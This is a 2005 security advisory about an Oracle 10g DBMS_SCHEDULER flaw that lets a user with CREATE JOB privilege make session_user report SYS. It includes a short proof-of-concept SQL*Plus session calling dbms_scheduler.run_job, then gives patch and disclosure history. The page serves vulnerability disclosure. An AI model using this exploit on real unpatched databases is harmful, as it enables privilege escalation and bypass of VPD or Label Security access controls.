Services
Information
Company |
DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Details The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user. Example Connect as a user with CREATE job privilege SQL> select user from dual; USER --------- JOBUSER SQL> execute dbms_scheduler.run_job('ANY_JOB'); PL/SQL procedure successfully completed. SQL> select user from dual; USER --------- SYS SQL> select (sys_context('userenv','session_user')) from dual; USER --------- SYS SQL> select (sys_context('userenv','current_user')) from dual; USER --------- JOBUSER SQL> show user USER is "jobuser" Patch Information Apply the patches for Oracle Critical Patch Update October 2005. History 05-may-2005 US CERT VU# added (V1.01) 07-may-2005 Oracle removed the forum entry from Metalink (V1.02) 18-oct-2005 Oracle released CPU October 2005 © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |